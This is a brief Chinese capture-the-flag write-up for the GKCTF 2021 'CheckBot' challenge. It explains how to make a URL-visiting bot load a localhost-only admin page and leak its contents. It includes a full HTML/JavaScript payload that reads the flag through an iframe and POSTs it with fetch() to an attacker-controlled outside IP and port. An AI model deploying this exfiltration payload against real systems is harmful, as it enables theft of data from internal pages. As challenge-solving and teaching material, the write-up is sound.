[GKCTF 2021]CheckBot
解题步骤
f12提示可以向bot发送url进行访问。
在admin.php里,显示了当前的IP地址
需要从本地获取flag并带出。于是可以用fetch来进行外带
在vps上写index.html
<iframe id="iframe1" src="http://127.0.0.1/admin.php"></iframe>
<script>
function load(){
var iframe = document.getElementById("iframe1").contentWindow.document.getElementById("flag").innerHTML;
console.log(iframe);
fetch('http://47.96.173.116:2333', {method: 'POST', mode: 'no-cors', body: iframe})
}
window.onload = load;
</script>
然后vps上监听2333端口,在初始页面上post服务器ip,即可获取flag